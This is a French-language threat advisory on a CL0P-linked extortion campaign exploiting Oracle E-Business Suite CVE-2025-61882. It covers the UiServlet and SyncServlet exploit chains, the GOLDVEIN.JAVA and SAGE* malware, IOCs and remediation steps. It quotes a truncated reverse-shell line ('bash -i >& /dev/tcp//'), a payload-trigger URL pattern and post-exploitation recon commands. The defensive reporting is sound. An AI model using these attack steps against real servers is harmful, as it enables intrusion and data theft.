Une collaboration entre le Google Threat Intelligence Group (GTIG) et Mandiant a révélé une campagne d’extorsion à grande échelle exploitant une vulnérabilité zero-day dans Oracle E-Business Suite (EBS). L’acteur derrière cette opération — qui revendique une affiliation avec la marque CL0P — aurait enchaîné mois d’intrusions silencieuses, exfiltration de données, et depuis le 29 septembre 2025, une marée d’emails envoyés aux dirigeants de divers secteurs pour exiger un paiement. Oracle a publié des patches d’urgence et recommande de les appliquer immédiatement.

Que s’est-il passé et pourquoi cela compte-t-il ?

• Principal vecteur : exploitation de CVE-2025-61882 (CVSS 9,8) et de chaînes de failles dans des composants d’EBS exposés à Internet.
• Chronologie : indices d’activité depuis juillet 2025 ; exploitation persistante depuis août ; extorsion à partir du 29 septembre.
• Cible : Oracle EBS, un ERP critique pour finance, achats, RH et opérations. La compromission de l’EBS limite ou empêche la movement latéral : les données sensibles y résident déjà.
• Mode opératoire : l’acteur envoie des emails d’extorsion depuis des comptes tiers compromis (accès infostéalers), affichant de listes réelles de fichiers EBS dérobés pour crédibiliser ses menaces.
• Marque CL0P : l’infrastructure et les artefacts rappellent des campagnes historiques liées à cet écosystème et à FIN11, bien qu’aucune attribution formelle ne soit encore confirmée.

Comment ça s’infiltre : deux chaînes contre EBS

1) UiServlet (pré-juillet / après-juillet avec tentatives infructueuses)

Des requêtes vers /OA_HTML/configurator/UiServlet combinent SSRF, injection CRLF, bypass d’authentification et injection XSL pour obtenir une RCE. Des tentatives ont été observées à la fois sous Linux (bash) et Windows (cmd.exe). Après les correctifs de juillet, certains essais montrent des timeout dans les logs, indiquant une mitigation partielle.

2) SyncServlet (à partir d’août, sans authentification)

Les attaques visant /OA_HTML/SyncServlet permettent une RCE sans authentification via le XDO Template Manager :

1. POST à SyncServlet.
2. Création d’une modèle malicieux XDO dans la base de données (XDO_TEMPLATES_B / XDO_LOBS), avec TEMPLATE_CODE souvent commençant par TMP ou DEF, et un type de template en XSL-TEXT ou XML.
3. Le déclenchement du payload via Template Preview avec une URL du type :
   /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=&TemplateType=…

Le payload XSL contient du Java intégré en Base64, qui charge des éléments additionnels en mémoire.

Contenu déployé : GOLDVEIN.JAVA et famille SAGE*

• GOLDVEIN.JAVA (téléchargeur) : version Java de GOLDVEIN qui se connecte à un C2 (masqué comme faux “TLSv3.1”) pour charger la seconde étape. Les résultats d’exécution peuvent apparaître camouflés dans des commentaires HTML.
• Chaîne SAGE* :
  • SAGEGIFT : loader réfléchi pour WebLogic.
  • SAGELEAF : dropper en mémoire installant SAGEWAVE.
  • SAGEWAVE : filtrage persistant du servlet acceptant un ZIP chiffré AES contenant des classes Java. Certaines variantes exigent un en-tête X-ORACLE-DMS-ECID fixe et filtrent les chemins contenant /help/.../iHelp/ ou /support/.../iHelp/.

Une fois le RCE obtenu, des commandes de reconnaissance ont été observées, exécutées par applmgr (ex : df -h, ip addr, netstat -an, consultations sur /etc/hosts, /etc/fstab, ARP, pings) ainsi que des shells inverses du type bash -i >& /dev/tcp//.

Extorsion et pression manuelle

Les emails de chantage ne comportent pas de rançon ni de canal de paiement initial; ils demandent contact via des boîtes mail associées à l’écosystème CL0P et présentent des preuves (listes de fichiers) pour légitimer l’accès. Conformément aux schémas précédents, ils n’affichent pas immédiatement les victimes sur leur site de fuite : ils attendent pour négocier et augmenter la pression.

Pourquoi ce cas augmente-t-il le risque ?

• ERP comme “coffre-fort” : en ciblant EBS, l’acteur optimise le retour sur investissement : les données critiques se trouvent déjà dans la plateforme.
• Artefacts “sans fichiers” : chargements Java en mémoire et canaux de sortie dissimulés rendent peu visible le travail des Sécurité & Antivirus.
• Échelle et répétition : CL0P/FIN11 ont démontré leur capacité à répéter cette formule : vulnérabilité zero-day → exploitation de masse → extorsion différée.

Signaux et IOC à surveiller pour alerter

• Adresses IP remarquées : 200.107.207.26, 161.97.99.49.
• C2 possibles pour GOLDVEIN.JAVA : 162.55.17.215:443, 104.194.11.200:443.
• Endpoints suspects :
  • /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG (attention particulière si TemplateCode commence par TMP ou DEF).
  • /OA_HTML/configurator/UiServlet.
  • /OA_HTML/SyncServlet.
  • Fragments : /help/state/content/destination./navId.1/navvSetId.iHelp/ et /support/state/content/destination./navId.1/navvSetId.iHelp/.
• Processus : jeunes processus du bash -i lancés par Java sous le compte applmgr.
• Réponses HTTP avec commentaires HTML “bruyants” pouvant contenir des sorties de commandes.

Que faire maintenant (dans cet ordre)

1) Appliquer immédiatement les patches.
Mettez à jour Oracle EBS avec les patches d’urgence d’octobre et les Critical Patch Updates. La correction de CVE-2025-61882 et des chaînes associées supprime la voie d’entrée connue.

2) Auditer les modèles XDO.
Vérifiez les créations récentes dans XDO_TEMPLATES_B et XDO_LOBS; examinez ceux avec TEMPLATE_CODE commençant par TMP ou DEF, ainsi que leur contenu XSL encodé en Base64 et chargeant des classes Java.

3) Bloquer toute sortie Internet depuis les serveurs EBS.
Filtrez et bloquez tout trafic sortant non essentiel. Ces familles ont besoin de C2 pour la deuxième étape et l’exfiltration. Ce contrôle permet de couper la chaîne, même si l’hôte est déjà compromis.

4) Renforcer la surveillance.
Utilisez un WAF/IDS avec des règles spécifiques pour UiServlet/SyncServlet, pour TemplatePreviewPG avec TMP/DEF, et pour les chemins iHelp. Augmentez la rétention des logs d’accès et déployez des détections pour repérer des réponses avec des commentaires HTML anormaux.

5) Effectuer une forensique mémoire si nécessaire.
Capturez les processus Java du middleware EBS ; recherchez les classes chargées de manière réfléchie et les filtres ajoutés.

6) Préparer la réponse à l’extorsion.
Elaborez des playbooks légaux et de communication. N’interagissez pas sans conseil spécialisé ; ne payez pas ; coordonnez avec les autorités et les CSIRT.

Conseils rapides pour CIO/CISO

• Inventaire de l’exposition : quelles instances EBS sont publiées et quelle version elles exécutent.
• Segmentation et zéro egress : aucune sortie Internet non contrôlée pour EBS.
• Gouvernance : politiques pour modèles et plugins d’EBS ; révisions périodiques de XDO.
• Simulations : organiser des jeux de rôle pour simuler une extorsion par email et tester les décisions techniques, légales ou réglementaires.

FAQ (Questions Fréquemment Posées)

Si j’ai déjà appliqué les patches d’octobre, suis-je en sécurité ?
Cela réduit considérablement le risque de nouvelles exploitations, mais il faut vérifier si une intrusion antérieure a eu lieu : auditez les modèles XDO, endpoints et trafic sortant.

Comment repérer un modèle malicieux dans EBS ?
Inspectez XDO_TEMPLATES_B et XDO_LOBS selon la date de création et les préfixes TMP/DEF. Cherchez des XSL encodés en Base64 avec des appels à des classes Java. Si vous en trouvez, considérez l’hôte comme compromis.

Le blocage de l’egress règle-t-il le problème ?
Non, cela ne nettoie pas le serveur, mais cela coupe la chaîne d’attaque (sans C2, sans deuxième étape ni exfiltration). C’est essentiel en complément du patch et des opérations de nettoyage.

Faut-il supposer une fuite de données ?
La campagne a montré une exfiltration dans plusieurs cas. En présence d’indicateurs IOC, engagez une forensique, une évaluation d’impact, informez les autorités si nécessaire, et préparez une communication avec les victimes.

Sources : Actualités de sécurité Oracle et cloud.google.com